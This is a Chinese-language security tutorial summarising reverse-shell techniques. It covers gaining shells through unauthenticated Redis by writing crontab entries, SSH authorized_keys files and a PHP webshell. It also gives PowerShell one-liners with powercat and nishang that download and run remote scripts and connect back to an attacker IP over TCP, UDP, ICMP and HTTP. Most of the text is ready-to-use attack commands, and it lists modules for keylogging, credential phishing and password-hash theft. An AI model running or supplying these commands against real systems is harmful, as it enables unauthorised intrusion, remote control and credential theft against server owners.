反弹shell的学习总结 - Part 1

本文作者：Cream（贝塔安全实验室-核心成员）

0x01：Redis未授权访问反弹shell

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。从2010年3月15日起，Redis的开发工作由VMware主持。从2013年5月开始，Redis的开发由Pivotal赞助。

Redis因配置不当可以未授权访问（窃取数据、反弹shell、数据备份操作主从复制、命令执行）。攻击者无需认证访问到内部数据，可导致敏感信息泄露，也可以恶意执行flushall来清空所有数据。攻击者可通过EVAL执行lua代码，或通过数据备份功能往磁盘写入后门文件。

1. 安装redis

wget http://download.redis.io/releases/redis-3.2.0.tar.gz tar -xvzf redis-3.2.0.tar.gz cd redis-3.2.0 make

1.2 修改配置文件

vim redis.conf bind 127.0.0.1前面加上#号 # bind 202.139.21.100 protected-mode设为no 启动redis-server ./src/redis-server redis-conf

默认的配置是使用6379端口，没有密码。这时候会导致未授权访问然后使用redis权限写文件！！

1.3 攻击利用

#### 1.redis基本命令 连接redis： redis-cli -h 192.168.63.130 查看redis版本信息、一些具体信息、服务器版本信息等等： 192.168.63.130:6379>info 将变量x的值设为test： 192.168.63.130:6379>set x "test" 获取设置的某个变量的值： 192.168.63.130:6379>get x 便可以看到之前设置的值 是把整个redis数据库删除，一般情况下不要用！！！ 192.168.63.130:6379>flushall 查看所有键： 192.168.63.130:6379>KEYS * 获取默认的redis目录、和rdb文件名：可以在修改前先获取，然后走的时候再恢复。 192.168.63.130:6379>CONFIG GET dir 192.168.63.130:6379>CONFIG GET dbfilename #### 2.攻击的几种方法 ##### (1).利用计划任务执行命令反弹shell 在redis以root权限运行时可以写crontab来执行命令反弹shell 先在自己的服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli -h 192.168.63.130 192.168.63.130:6379> set xx "n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1n" OK 192.168.63.130:6379> config set dir /var/spool/cron/ OK 192.168.63.130:6379> config set dbfilename root OK 192.168.63.130:6379> save OK

nc监听端口已经反弹回来shell

1.4 Redis的其他应用

如果Redis以root身份运行，可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器。

1.4.1 写ssh-keygen公钥然后使用私钥登录

利用条件：

1. Redis服务使用ROOT账号启动
2. 服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器

操作流程：

Step 1：首先在本地生成一对密钥：

root@kali:~/.ssh# ssh-keygen -t rsa

查看密钥：

然后在redis执行命令

192.168.63.130:6379> config set dir /root/.ssh/ OK 192.168.63.130:6379> config set dbfilename authorized_keys OK 192.168.63.130:6379> set x " AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx" OK 192.168.63.130:6379> save OK

之后直接使用公钥登录即可

1.4.2 往web物理路径（document root）写webshell

当redis权限不高时，并且服务器开着web服务，在redis有web目录写权限时，可以尝试往web路径写webshell。

192.168.63.130:6379> config set dir /var/www/html/ OK 192.168.63.130:6379> config set dbfilename shell.php OK 192.168.63.130:6379> set x "<?php phpinfo();?>" OK 192.168.63.130:6379> save OK

即可将shell写入web目录(web目录根据实际情况)

访问之：

0x02：Powershell反弹shell

Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念，从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。

一旦攻击者可以在一台计算机上运行代码，他们便可以下载powershell脚本文件（.ps1）到磁盘执行，脚本可以在内存中运行(无文件化)。我们可以将powershell看做是命令提示符cmd.exe的扩展。

各个系统中Powershell的版本如下：

可以在输入Get-Host或者$PSVersionTable.PSVERSION来查看版本信息，如下所示：

2.1 powercat反弹shell

powercat（https://github.com/besimorhino/powercat）为Powershell版的Netcat，实际上是一个powershell的函数，使用方法类似Netcat。

攻击者监听：

Nc –lvnp 9999 

目标机反弹CMD：

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd

或者在攻击者端执行下面的代码：

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -l -p 9999

2.2 nishang反弹shell

Nishang（https://github.com/samratashok/nishang）是一个基于PowerShell的攻击框架，集合了一些PowerShell攻击脚本和有效载荷，可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

Nishang要在PowerShell3.0以上的环境下才可以正常使用，在window 7或者server2008上可能会出现一些异常。

导入Nishang模块 Import-Module .nishang.psm1 导入成功后，产看Nishang中模块 Get-Command –Module nishang

Nishang攻击模块有（只介绍部分）：

1. Check-VM：检测目标机器是否为虚拟机
2. Invoke-CredentialsPhish：欺骗目标主机用户，用作钓鱼
3. Copy-VSS：利用Volume Shaodow Copy复制sam文件
4. FireBuster FireLiStener：用作内网环境扫描
5. Keylogger：用作键盘记录
6. Invoke-Mimikatz：类似Mimikatz，直接获取系统账号明文密码
7. Get-PassHashes：获取系统密码hash值
8. ......

2.2.1 基于TCP的Powershell交互式shell

在目标机上执行如下的代码：

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.4 -port 9999其中，Invoke-PowerShellTcp是基于TCP协议的Powershell正向连接或者反向连接shell，其参数如下：
- IPAddress 反向连接时设置的IP
- Port 正向连接时设置的端口，前面要写上-Bind参数
- Reverse  反向连接
- Bind 正向连接

反向连接：Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.4 -port 9999

注意：可将nishang下载到攻击者本地，执行如下的代码（此时推荐使用python搭建简易WEB服务）：

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.14/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1. 4 -port 6666

正向连接：Invoke-PowerShellTcp -Bind -Port 4444

2.2.2 基于UDP的Powershell交互式shell

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.1.4 -port 5399

在攻击者的电脑上执行如下的命令：

nc -lup 6005 

上述测试是反向连接，那么正向连接的时候，在攻击者的电脑上运行的命令为：

nc -nvu 192.168.1.24 4555

2.2.3 基于ICMP的Poershell交互式Shell

需要借助于icmpsh_m.py文件，其用法如下：

用法攻击机执行：

./icmpsh-m.py <source IP address> <destination IP address>

在被攻击的机器上执行：

Invoke-PowerShellIcmp -IPAddress <source IP address>

2.2.4 基于HTTP/HTTPS的Poershell交互式Shell

HTTP: Invoke-PoshRatHttp –IPAddess 192.168.1.4 –Port 4444
HTTPS: Invoke-PoshRatHttps  –IPAddess 192.168.1.4 –Port 4444然后会生成一个powershell如下的命令····IEX  ((New-Object Net.WebClient).DownloadString(‘http://192.168.1.4:4444/connect’))
然后复制该命令在被攻击机器上执行即可，便可看到反弹的shell